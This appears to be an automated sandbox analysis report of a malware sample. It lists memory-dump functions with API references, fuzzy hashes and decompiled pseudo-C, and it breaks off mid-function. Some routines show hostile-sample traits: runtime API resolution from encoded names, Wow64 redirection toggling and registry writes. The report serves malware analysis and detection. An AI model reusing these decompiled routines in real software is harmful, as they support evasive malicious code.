0x00000000
0x0477721f
0x0477721f
0x04777224
0x0477722c
0x04777230
0x04777233
0x00000000
0x04777235
0x04777235
0x0477723a
0x04777242
0x04777246
0x04777249
0x00000000
0x0477724b
0x04777251
0x04777256
0x0477725d
0x04777264
0x04777267
0x00000000
0x04777269
0x0477726c
0x0477726c
0x04777267
0x04777249
0x04777233
0x0477721d
0x04777207
0x047771f1
0x04777286

APIs

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04777852,?,?,?,?,00000000,00000000), ref: 047771C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 047771EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 04777200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04777216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0477722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04777242

Part of subcall function 0477225C: memset.NTDLL ref: 047722DB

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 500b20f7d1d299adee0b62ba7235beaca1fff3733ae6a66580696e377156cd14
Instruction ID: 4c99c578b2465243b104369f5b1fe5ed113cd3bf313b775819df671d331438dd
Opcode Fuzzy Hash: 500b20f7d1d299adee0b62ba7235beaca1fff3733ae6a66580696e377156cd14
Instruction Fuzzy Hash: EE21FEB1600206EFEB20DF69CE44E5A77FCEB44744B818565E615CB211E635FD058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C54C541, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__mtinitlocks.LIBCMT ref: 6C54C546
__mtterm.LIBCMT ref: 6C54C54F
__calloc_crt.LIBCMT ref: 6C54C574
__initptd.LIBCMT ref: 6C54C596
GetCurrentThreadId.KERNEL32 ref: 6C54C59D

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2314865971-0
Opcode ID: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
Instruction ID: 450b48cbd1d5bf3d31011e6910bc922675441b8ffd56e78f29fa017a9fcd88cb
Opcode Fuzzy Hash: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
Instruction Fuzzy Hash: DBF02B326196519EEA247A746C016DF3ED08FC27B8F21C61AE060D5FD0FF11BC4D92A4

Uniqueness

Uniqueness Score: -1.00%

Function 6C5421E6, Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 6C5421EA
__calloc_crt.LIBCMT ref: 6C5421FB

Part of subcall function 6C547076: __calloc_impl.LIBCMT ref: 6C547085

___pctype_func.LIBCMT ref: 6C54220E
_memmove.LIBCMT ref: 6C542217
___pctype_func.LIBCMT ref: 6C542228
____lc_locale_name_func.LIBCMT ref: 6C542234

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
String ID:
API String ID: 1321936363-0
Opcode ID: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
Instruction ID: dd036db6073648b4b921246560563bc2f7dccf9fa799ff66045b81171161632a
Opcode Fuzzy Hash: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
Instruction Fuzzy Hash: 52F0A971544B01EBE7109FA5AC09B86B7D4AF40359F10C82DE598CBB80EBB5E8448B51

Uniqueness

Uniqueness Score: -1.00%

Function 6C5404B0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 208COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C5404D3

Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
_memmove.LIBCMT ref: 6C54057B

Strings

string too long, xrefs: 6C5405B4

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception$_malloc_memmove
String ID: string too long
API String ID: 4023115364-2556327735
Opcode ID: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
Instruction ID: 3f3128896fdc98e9325244940e7c7e56eb08946a64dd683fd655f9b03fcfda5a
Opcode Fuzzy Hash: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
Instruction Fuzzy Hash: 2751E9327012518BD7248E2CAC50A5BB3A5EFE1714F308D2FE592CBF81D761E845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 047763CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E047763CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04772BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x477a2d0; // 0x96d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x477b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x477b92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x477a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x047763cd
0x047763d4
0x047763d8
0x047763dd
0x047763e4
0x047763e7
0x047763f1
0x047763f6
0x04776402
0x04776409
0x04776413
0x04776413
0x0477640b
0x0477640b
0x0477640b
0x0477640b
0x04776419
0x0477641c
0x04776424
0x04776427
0x0477642a
0x0477642d
0x04776432
0x0477643b
0x04776448
0x0477643d
0x04776443
0x04776443
0x0477644e
0x0477644e
0x04776456

APIs

Part of subcall function 04772BF3: SysAllocString.OLEAUT32(?), ref: 04772C4F
Part of subcall function 04772BF3: SysAllocString.OLEAUT32(0070006F), ref: 04772C63
Part of subcall function 04772BF3: SysAllocString.OLEAUT32(00000000), ref: 04772C75
Part of subcall function 04772BF3: SysFreeString.OLEAUT32(00000000), ref: 04772CD9

memset.NTDLL ref: 047763F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0477642D
GetLastError.KERNEL32 ref: 0477643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0477644E

Strings

<, xrefs: 04776402

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 09cb6f5ab7205489a057bc876cffa615fbbc61a91d81f04ce21a535c0c48c43f
Instruction ID: f67ae210e6a5691345a799f1582420457d455d9656449998a4bde644c6283d12
Opcode Fuzzy Hash: 09cb6f5ab7205489a057bc876cffa615fbbc61a91d81f04ce21a535c0c48c43f
Instruction Fuzzy Hash: E71100B1940218ABEB10DFA5D889BDD7BF8FB08794F948426E905E7241E774A604CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C55088C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C550898

Part of subcall function 6C547276: __FF_MSGBANNER.LIBCMT ref: 6C54728D
Part of subcall function 6C547276: __NMSG_WRITE.LIBCMT ref: 6C547294
Part of subcall function 6C547276: RtlAllocateHeap.NTDLL(6D56935C,00000000,00000001), ref: 6C5472B9

_free.LIBCMT ref: 6C5508AB

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
Instruction ID: 769f1eab436e2ce4118b27321232a20ba578d820adf8f7ba1b35b09306f86845
Opcode Fuzzy Hash: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
Instruction Fuzzy Hash: E411C172949395EBEF106B789C04B9A3BB59F813ACB558527F81486E50DF348864CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 04772A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04772A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x477a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x477a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x477a2b0 = _t6;
				 *0x477a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x477a2ac = _t7;
				if(_t7 == 0) {
					 *0x477a2ac =  *0x477a2ac | 0xffffffff;
				}
				return 0;
			}

0x04772a20
0x04772a28
0x04772a2d
0x00000000
0x04772a7a
0x04772a2f
0x04772a37
0x04772a77
0x00000000
0x04772a77
0x04772a39
0x04772a3e
0x04772a50
0x04772a55
0x04772a5b
0x04772a63
0x04772a68
0x04772a6a
0x04772a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0477446F,?,?,00000001), ref: 04772A20
GetVersion.KERNEL32(?,00000001), ref: 04772A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 04772A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04772A5B
GetLastError.KERNEL32(?,00000001), ref: 04772A7A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: f5928c85c952e0853e688c7bfd874cb33735b7fc7dc83c7a72b13228a5daebb0
Instruction ID: 5d74cecff86463836594e8f9d8c55aa8ed63e7cc41e1ccde5979087a249c0751
Opcode Fuzzy Hash: f5928c85c952e0853e688c7bfd874cb33735b7fc7dc83c7a72b13228a5daebb0
Instruction Fuzzy Hash: 0FF049B0796302AFFB309F61AA097993BA0F748750F80C969EB16C53C0E6799800CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0477202E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0477202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x477a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E047733FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E04774B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E04772A03(_a8);
						goto L29;
					}
					_t65 =  *0x477a2d0; // 0x96d5a8
					_t16 = _t65 + 0x477b908; // 0x65696c43
					_t68 = E047733FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d047790
						if(E04775C15(_t103,  *_t33, _t97, _a8,  *0x477a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x477a2d0; // 0x96d5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x477ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x477b927; // 0x55434b48
								_t73 = _t34;
							}
							if(E0477762C(_t73,  *0x477a384,  *0x477a388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x477a2d0; // 0x96d5a8
									_t44 = _t75 + 0x477b893; // 0x74666f53
									_t78 = E047733FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d047790
										E047733B7( *_t47, _t97, _a8,  *0x477a388, _a24);
										_t49 = _t107 + 0x10; // 0x3d047790
										E047733B7( *_t49, _t97, _t105,  *0x477a380, _a16);
										E04772A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d047790
									E047733B7( *_t40, _t97, _a8,  *0x477a388, _a24);
									_t43 = _t107 + 0x10; // 0x3d047790
									E047733B7( *_t43, _t97, _a8,  *0x477a380, _a16);
								}
								if( *_t107 != 0) {
									E04772A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d047790
					if(E04775419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d047790
							E04775C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E04772A03(_t106);
						_t104 = _a16;
					}
					E04772A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E04777973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x477a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x0477202e
0x04772037
0x0477203e
0x04772043
0x047720b0
0x047720b6
0x047720bb
0x047720c4
0x047720cb
0x047720ce
0x04772242
0x04772249
0x04772249
0x0477224e
0x04772250
0x04772250
0x04772259
0x04772259
0x047720d4
0x047720e0
0x04772238
0x0477223b
0x00000000
0x0477223b
0x047720e6
0x047720eb
0x047720f4
0x047720fb
0x047720fe
0x04772148
0x04772148
0x0477215b
0x04772165
0x0477216d
0x04772172
0x0477217c
0x0477217c
0x04772174
0x04772174
0x04772174
0x04772174
0x0477219e
0x047721a6
0x047721d4
0x047721d9
0x047721e2
0x047721e7
0x047721eb
0x0477221d
0x047721ed
0x047721fa
0x047721fd
0x0477220d
0x04772210
0x04772216
0x04772216
0x047721a8
0x047721b5
0x047721b8
0x047721ca
0x047721cd
0x047721cd
0x04772227
0x04772233
0x04772229
0x0477222c
0x0477222c
0x04772227
0x0477219e
0x00000000
0x04772165
0x0477210d
0x04772117
0x04772119
0x0477211e
0x04772122
0x04772124
0x0477212f
0x04772132
0x04772132
0x04772138
0x0477213d
0x0477213d
0x04772143
0x00000000
0x04772143
0x04772048
0x00000000
0x0477206f
0x0477206f
0x0477207b
0x0477208e
0x04772094
0x0477209c
0x00000000
0x0477209c

APIs

StrChrA.SHLWAPI(04777319,0000005F,00000000,00000000,00000104), ref: 04772061
lstrcpy.KERNEL32(?,?), ref: 0477208E

Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
Part of subcall function 047733FA: memset.NTDLL ref: 0477343C

Part of subcall function 047733B7: lstrlenW.KERNEL32(04777319,?,?,04772202,3D047790,80000002,04777319,0477742D,74666F53,4D4C4B48,0477742D,?,3D047790,80000002,04777319,?), ref: 047733D7

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

lstrcpy.KERNEL32(?,00000000), ref: 047720B0

Strings

\, xrefs: 04772094

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: 628d072f959bff7cc67fad9c54041b295b193be4cf7c29d1448b245d58be7cc2
Instruction ID: 7910ad58c598784b34823dae304125d095c8dda4e9f3821951b6de688123393a
Opcode Fuzzy Hash: 628d072f959bff7cc67fad9c54041b295b193be4cf7c29d1448b245d58be7cc2
Instruction Fuzzy Hash: 65514F7250020AEFEF219FA4DD44E9A37B9FF04344F918864FA2596222E735FD15DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6C556762, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6C556779
_wcscmp.LIBCMT ref: 6C55678A

Strings

OCP, xrefs: 6C556784
ACP, xrefs: 6C556773

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
Instruction ID: e32e385c8bb73fe654b9a52975f30fe24852345029cc45bad2e47c01f4767da8
Opcode Fuzzy Hash: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
Instruction Fuzzy Hash: 9801C032215345BEFB009A59DC85FDA33EC9F0076CF808427F904EAB81FB30DAA48294

Uniqueness

Uniqueness Score: -1.00%

Function 047713B4, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E047713B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x477a2d0; // 0x96d5a8
					_t5 = _t102 + 0x477b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x47792d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x477a2d0; // 0x96d5a8
												_t28 = _t108 + 0x477b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x477a2d0; // 0x96d5a8
														_t33 = _t78 + 0x477b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x047713b9
0x047713c2
0x047713c3
0x047713c7
0x047713cd
0x047713d3
0x047713dc
0x047713e2
0x047713ec
0x047713ee
0x047713f4
0x047713f9
0x04771404
0x0477140c
0x0477140f
0x04771532
0x04771415
0x04771415
0x04771422
0x04771428
0x0477142e
0x04771432
0x04771438
0x04771445
0x04771449
0x0477144f
0x04771452
0x04771458
0x0477145e
0x04771464
0x04771467
0x0477146a
0x04771470
0x04771479
0x0477147f
0x04771480
0x04771483
0x04771484
0x04771485
0x0477148d
0x0477148e
0x0477148f
0x04771491
0x04771495
0x04771499
0x00000000
0x00000000
0x0477149f
0x047714a8
0x047714ae
0x047714b8
0x047714bc
0x047714be
0x047714cb
0x047714cf
0x047714d7
0x047714dc
0x047714ee
0x047714f0
0x047714f6
0x047714f6
0x047714ff
0x047714ff
0x04771501
0x04771507
0x04771507
0x0477150a
0x04771510
0x04771513
0x0477151c
0x00000000
0x00000000
0x00000000
0x0477151c
0x04771470
0x0477146a
0x04771452
0x04771522
0x04771522
0x04771528
0x04771528
0x0477152e
0x0477152e
0x04771537
0x0477153d
0x0477153d
0x047713f9
0x04771546

APIs

SysAllocString.OLEAUT32(047792D0), ref: 04771404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 047714E6
SysFreeString.OLEAUT32(00000000), ref: 047714FF
SysFreeString.OLEAUT32(?), ref: 0477152E

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: b2215b92ef4a2245a9496095a0d0f57545d45d6e308ccb6f90ec741315c2c25e
Instruction ID: 74a6dddabcd0098a8bc9fbc82ff8a50b501052021578051173a4ec02528e3a44
Opcode Fuzzy Hash: b2215b92ef4a2245a9496095a0d0f57545d45d6e308ccb6f90ec741315c2c25e
Instruction Fuzzy Hash: A8511DB6D00509DFCF04DFA8C4888AEB7B9FF89704B548594E916EB310D735AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C542319, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6C542371
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,00000001,?), ref: 6C5423BF
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C542435
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C54245D

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
Instruction ID: 368c42ebfee037e389d4d3dc3f377a64b62501de662ef2be758ff76a58f0bcb2
Opcode Fuzzy Hash: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
Instruction Fuzzy Hash: 8641D13160436AEFDB158F65CC48B6E7BBAAF42315F15C529F854DBA80D770E884CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C547BF3, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C547C89
__flush.LIBCMT ref: 6C547CA9
__write.LIBCMT ref: 6C547CDC
__flsbuf.LIBCMT ref: 6C547D0A

Part of subcall function 6C547183: __getptd_noexit.LIBCMT ref: 6C547183

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
Instruction ID: 076f22894ae71d492647b2c662552c02d69159ee23f0aeea712e0f25032e28c5
Opcode Fuzzy Hash: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
Instruction Fuzzy Hash: E141C631B056059BDB18CF69CC905AE77A6EF913A8B21CA3DE815C7A40E770DD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04771E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04771E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04775278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04772399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04773C32(_t101,  &_v428, _a8, _t96 - _t81);
					E04773C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04772399(_t101,  &E0477A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04772399(_a16, _a4);
						E0477114C(_t79,  &_v428, _a4, _t97);
